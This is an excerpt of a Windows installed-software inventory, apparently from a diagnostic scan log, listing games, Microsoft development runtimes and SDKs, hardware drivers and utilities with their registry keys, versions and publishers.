Arma 2: Operation Arrowhead (HKLM-x32\...\Steam App 33930) (Version:  - Bohemia Interactive)
Arma 2: Private Military Company (HKLM-x32\...\Steam App 65720) (Version:  - Bohemia Interactive)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
ArmA3Sync 1.4.54 (HKLM-x32\...\{F097E7D7-D093-4394-9EED-43AFCCD12B7A}_is1) (Version: 1.4.54 - The [S.o.E] team)
Audacity 2.0.6 (HKLM-x32\...\Audacity_is1) (Version: 2.0.6 - Audacity Team)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Awesomium Redistributable (HKLM-x32\...\{5BCB064B-9F65-4E15-BAFB-669E72E54FD9}) (Version: 1.7.4.2 - SIX Networks GmbH)
AwesomiumSetup (HKLM-x32\...\{19EF99D1-7EE6-4B5E-ABEE-0B3825F703B0}) (Version: 1.00.0000 - SIX Networks GmbH)
Azure AD Authentication Connected Service (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
AzureTools.Notifications (x32 Version: 2.7.30611.1601 - Microsoft Corporation) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.7.2.45672 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
BattlEye for OA Uninstall (HKLM-x32\...\BattlEye for OA) (Version:  - )
BattlEye Uninstall (HKLM-x32\...\BattlEye for A2) (Version:  - )
BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version:  - Irrational Games)
Blend for Visual Studio SDK for .NET 4.5 (x32 Version: 3.0.40218.0 - Microsoft Corporation) Hidden
Blender (HKLM\...\Blender) (Version: 2.73 - Blender Foundation)
Brother HL-3045CN (HKLM-x32\...\{409529DB-DBB1-40F8-84DC-8D97880D3FC6}) (Version: 1.00 - Brother)
CEVO CS:GO Client Beta version 1.0 (HKLM-x32\...\CEVO CS:GO Client Beta_is1) (Version: 1.0 - )
Counter-Strike: Global Offensive - SDK (HKLM-x32\...\Steam App 745) (Version:  - )
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version:  - Valve)
CPUID CPU-Z 1.71.1 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.43 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.41 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.03 - Creative Technology Limited)
Creative System Information (HKLM-x32\...\SysInfo) (Version:  - )
Crysis (HKLM\...\Steam App 17300) (Version:  - Crytek)
Crystal Reports for Visual Studio (x32 Version: 12.51.0.240 - SAP) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Debian-Installer loader (HKLM-x32\...\Debian-Installer Loader) (Version: 0.7.4.7+deb7u2+bsos1 - The Debian Project)
DOOM 3: BFG Edition (HKLM-x32\...\Steam App 208200) (Version:  - id Software)
Dotfuscator and Analytics Community Edition 5.18.1 (x32 Version: 5.18.1.2898 - PreEmptive Solutions) Hidden
Dotfuscator Software Services - Community Edition (HKLM-x32\...\{1AA5BD63-6614-44B2-88A7-605191EDB835}) (Version: 5.0.2500.0 - PreEmptive Solutions)
Dreamfall Chapters (HKLM-x32\...\Steam App 237850) (Version:  - Red Thread Games)
Dropbox (HKLM-x32\...\Dropbox) (Version: 12.4.22 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.35.1 - Dropbox, Inc.) Hidden
Dxtory version 2.0.126 (HKLM-x32\...\Dxtory2.0_is1) (Version: 2.0.126 - ExKode Co. Ltd.)
EasyBCD 2.2 (HKLM-x32\...\EasyBCD) (Version: 2.2 - NeoSmart Technologies)
ESEA (HKLM\...\Steam App 479130) (Version:  - ESEA)
ESEA Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\ESEA) (Version: 5.0.0.0 - E-Sports Entertainment LLC)
ESN Sonar (HKLM-x32\...\ESN Sonar-0.70.4) (Version: 0.70.4 - ESN Social Software AB)
EVGA PrecisionX 16 (HKLM-x32\...\{4C5ECFC6-AF6E-42A0-988D-0A5FCBB8F0B9}) (Version: 5.3.11 - EVGA Corporation)
FaceRig (HKLM-x32\...\Steam App 274920) (Version:  - Holotech Studios)
FaceRig Virtual Video driver version 1.0.1.1000 (HKLM-x32\...\{7D6A1A0F-F57E-4C6B-9331-86CBC7D5C787}_is1) (Version: 1.0.1.1000 - Adoriasoft LLC)
Far Cry (HKLM\...\Steam App 13520) (Version:  - Crytek Studios)
Free Video Editor version 1.4.12.525 (HKLM-x32\...\Free Video Editor_is1) (Version: 1.4.12.525 - DVDVideoSoft Ltd.)
GameSpy Comrade (HKLM-x32\...\{5F4C776F-8CBD-4C4F-892F-B568ABDD70C8}) (Version: 1.5.0.156 - GameSpy)
Geeks3D.com FurMark 1.9.2 (HKLM-x32\...\{2397CAD4-2263-4CD0-96BE-E43A980B9C9A}_is1) (Version:  - Geeks3D.com)
GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
Heaven Benchmark version 4.0 (HKLM-x32\...\Unigine Heaven Benchmark (Basic Edition)_is1) (Version: 4.0 - Unigine Corp.)
IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.37 - Irfan Skiljan)
iZ3D Driver Remove (HKLM-x32\...\{30BEF9F2-CD3F-4B13-9E5C-BFE2F9544572}_is1) (Version: 1.13(5443) - iZ3D Inc.)
Jasc Paint Shop Pro 9 (HKLM-x32\...\{F843C6A3-224D-4615-94F8-3C461BD9AEA0}) (Version: 9.00.0000 - Jasc Software Inc)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217055FF}) (Version: 7.0.650 - Oracle)
Java 7 Update 75 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417075FF}) (Version: 7.0.750 - Oracle)
Java SE Development Kit 7 Update 75 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0170750}) (Version: 1.7.0.750 - Oracle)
JMicron JMB36X Driver (HKLM-x32\...\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.17.65.11 - JMicron Technology Corp.)
Juniper Networks Host Checker (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Neoteris_Host_Checker) (Version: 8.0.7.32723 - Juniper Networks)
Juniper Networks Setup Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Juniper_Setup_Client) (Version: 8.0.7.50111 - Juniper Networks)
Juniper Networks Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Networks Setup Client Activex Control (HKLM-x32\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks)
Juniper Terminal Services Client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\Juniper_Term_Services) (Version: 8.0.7.32723 - Juniper Networks)
Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version:  - Tripwire Interactive)
K-Lite Codec Pack 10.8.0 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.8.0 - )
L3DT Professional v15.01.0.1 (remove only) (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\L3DT Professional (v15.01.0.1)) (Version:  - )
Lagarith Lossless Codec (1.3.27) (HKLM-x32\...\{F59AC46C-10C3-4023-882C-4212A92283B3}_is1) (Version:  - )
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
Logitech Gaming Software 8.74 (HKLM\...\Logitech Gaming Software) (Version: 8.74.80 - Logitech Inc.)
Logos Bible Software (HKLM-x32\...\{CD408DC0-F28A-4909-A18D-218C1394A59B}) (Version: 6.224.65 - Faithlife Corporation)
LOOT version 0.8.1 (HKLM-x32\...\{BF634210-A0D4-443F-A657-0DCE38040374}_is1) (Version: 0.8.1 - LOOT Team)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
marvell 91xx driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1036 - Marvell)
Marvell Miniport Driver (HKLM-x32\...\Marvell Miniport Driver) (Version: 11.10.5.3 - Marvell)
Mass Effect™ (HKLM-x32\...\{44A570EE-FD93-4086-8997-2C38DFDE0019}) (Version: 1.2.20608.0 - Electronic Arts)
MechWarrior Online (HKLM-x32\...\{73bcb521-8936-42d7-ad00-ec2bb399e26c}) (Version: 1.4.3.0 - Piranha Games Inc.)
MechWarrior Online (x32 Version: 1.4.3.0 - Piranha Games Inc.) Hidden
Medal of Honor Allied Assault (HKLM-x32\...\{0DEA94ED-915A-4834-A87E-388D012C8E02}) (Version:  - )
METAL GEAR SOLID V: GROUND ZEROES (HKLM-x32\...\Steam App 311340) (Version:  - Kojima Productions)
METAL GEAR SOLID V: THE PHANTOM PAIN (HKLM-x32\...\Steam App 287700) (Version:  - Konami Digital Entertainment)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5 Multi-Targeting Pack (HKLM-x32\...\{56E962F0-4FB0-3C67-88DB-9EAA6EEFC493}) (Version: 4.5.50710 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (ENU) (HKLM-x32\...\{D3517C62-68A5-37CF-92F7-93C029A89681}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 Multi-Targeting Pack (HKLM-x32\...\{6A0C6700-EA93-372C-8871-DCCF13D160A4}) (Version: 4.5.50932 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 SDK (HKLM-x32\...\{19A5926D-66E1-46FC-854D-163AA10A52D3}) (Version: 4.5.51641 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (ENU) (HKLM-x32\...\{290FC320-2F5A-329E-8840-C4193BD7A9EE}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 Multi-Targeting Pack (HKLM-x32\...\{B941AFB4-8851-33A1-9E72-0C33D463C41C}) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.6 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 SDK (HKLM-x32\...\{B5915D37-0637-4A26-A3AA-C5DC9F856370}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (ENU) (HKLM-x32\...\{3D3CEBE6-40EA-4C48-97FD-73828281AB4A}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft .NET Framework 4.6 Targeting Pack (HKLM-x32\...\{2CC6A4A7-AAC2-46C9-9DBB-3727B5954F65}) (Version: 4.6.00081 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE (HKLM-x32\...\{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}) (Version: 3.1.186.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.23107 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK (HKLM-x32\...\{2012098D-EEE9-4769-8DD3-B038050854D4}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft Silverlight 4 SDK (HKLM-x32\...\{05855322-BE43-41FE-B583-D3AE0C326D58}) (Version: 4.0.50826.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{C688457E-03FD-4941-923B-A27F4D42A7DD}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{BBDE8A3D-64A2-43A6-95F3-C27B87DF7AC1}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Framework (HKLM-x32\...\{BC537AE0-88AF-47ED-B762-33B0D62B5188}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{7A56D81D-6406-40E7-9184-8AC1769C4D69}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{77F1F8AD-51B8-4490-AEEC-BF480073E0FC}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (x64) (HKLM\...\{EAEBF166-B06A-4D7F-BAF7-6615303D5C7C}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{09C52940-A4D1-4409-A7CC-1AAE630CF578}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{877B76B2-F83F-4F5A-B28D-3F398641ADB6}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{1E6ED082-E32D-4B2B-8B6A-70B094815135}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{0826F9E4-787E-481D-83E0-BC6A57B056D5}) (Version: 10.1.2531.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) (HKLM\...\{8438EC02-B8A9-462D-AC72-1B521349C001}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 (HKLM-x32\...\{0E3DFC64-CC49-4BE2-8C9C-58EF129675DB}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) (HKLM\...\{034106B5-54B7-467F-B477-5B7DBB492624}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) (HKLM\...\{1D1CEEF8-3741-45BD-8E77-963E1DEBDDD3}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{68BA34E8-9B9D-4A74-83F0-7D366B532D75}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft Team Foundation Server 2010 Object Model - ENU (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ENU) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Basic PowerPacks 10.0 (HKLM-x32\...\{85317F07-8719-36EF-B19E-B196F383D0F3}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{86CE1746-9EFF-3C9C-8755-81EA8903AC34}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{F5079164-1DB9-3BDA-853B-F78AF67CE071}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.40219 (HKLM\...\{1C7C8AAF-A16D-32E8-89E5-F6D165DE0BCE}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Professional - ENU (HKLM-x32\...\Microsoft Visual Studio 2010 Professional - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Service Pack 1 (HKLM-x32\...\Microsoft Visual Studio 2010 Service Pack 1) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2015 Tools for Unity (HKLM-x32\...\{F0DB2786-18C8-4B0D-9DC2-BA58856A2821}) (Version: 2.1.0.0 - Microsoft Corporation)
Microsoft Visual Studio Community 2015 (HKLM-x32\...\{50b32652-69d2-4b93-9316-edcd12067b8b}) (Version: 14.0.23107.10 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle-earth: Shadow of Mordor (HKLM-x32\...\Steam App 241930) (Version:  - Monolith Productions, Inc.)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minimal ADB and Fastboot version 1.2 (HKLM-x32\...\{06C90FCC-4C95-4142-A0AF-D3A4C12882DE}_is1) (Version: 1.2 - Sam Rodberg)
MiniTool Partition Wizard Free 9.0 (HKLM-x32\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version:  - MiniTool Solution Ltd.)
Monitor Calibration Wizard 1.0 (HKLM-x32\...\Monitor Calibration Wizard) (Version:  - )
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 47.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 en-US)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
Multi-Device Hybrid Apps using C# - Templates - ENU (x32 Version: 14.0.23107 - Microsoft Corporation) Hidden
Mumble 1.2.16 (HKLM-x32\...\{8C0C80AA-EA4D-4461-8B73-15A3A27F7D98}) (Version: 1.2.16 - Thorvald Natvig)
NEC Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{D7BF9739-8A68-4335-BBEE-37752AD9E86B}) (Version: 1.0.19.0 - NEC Electronics Corporation)
NEC Electronics USB 3.0 Host Controller Driver (x32 Version: 1.0.19.0 - NEC Electronics Corporation) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.0.10.0) (Version: 4.0.10.0 - Locktime Software)
NetLimiter 4 (Version: 4.0.10.0 - Locktime Software) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.61.2 - Black Tree Gaming)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.8.6 - Notepad++ Team)
NVIDIA Graphics Driver 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.06 - NVIDIA Corporation)
NVIDIA Photoshop Plug-ins (HKLM-x32\...\{23F79416-CAD1-41BF-99A3-040F6C814AAA}) (Version: 8.50 - )
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
OBS Multiplatform (HKLM-x32\...\OBS Multiplatform) (Version: 0.12.2 - OBS Project)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 0.14.2 - OBS Project)
Oculus Display Driver (Install Only) (HKLM\...\{2C48475F-F6AA-48BC-827E-67C21685BE65}) (Version: 1.2.2.0 - Oculus VR, LLC)
Oculus Positional Tracker Driver (Install Only) (HKLM\...\{53CBAB0B-4713-4743-B62F-325ED1B6869F}) (Version: 0.0.1.7 - Oculus VR, LLC)
Oculus Runtime (HKLM-x32\...\Oculus Runtime 0.4.4 Rev 1) (Version: 0.4.4 Rev 1 - Oculus VR, LLC)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.1 (HKLM-x32\...\{9395F41D-0F80-432E-9A59-B8E477E7E163}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.4.22.2815 - Electronic Arts, Inc.)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
Papers, Please (HKLM-x32\...\Steam App 239030) (Version:  - 3909)
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Daybreak Games)
PlanetSide 2 (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\DG0-PlanetSide 2) (Version:  - Sony Online Entertainment)
Play withSIX Windows client (HKU\S-1-5-21-1771700083-1338792134-2885675772-1001\...\PlaywithSIX) (Version: 1.68.1172.2 - SIX Networks GmbH)
PreEmptive Analytics Visual Studio Components (x32 Version: 1.2.5134.1 - PreEmptive Solutions) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
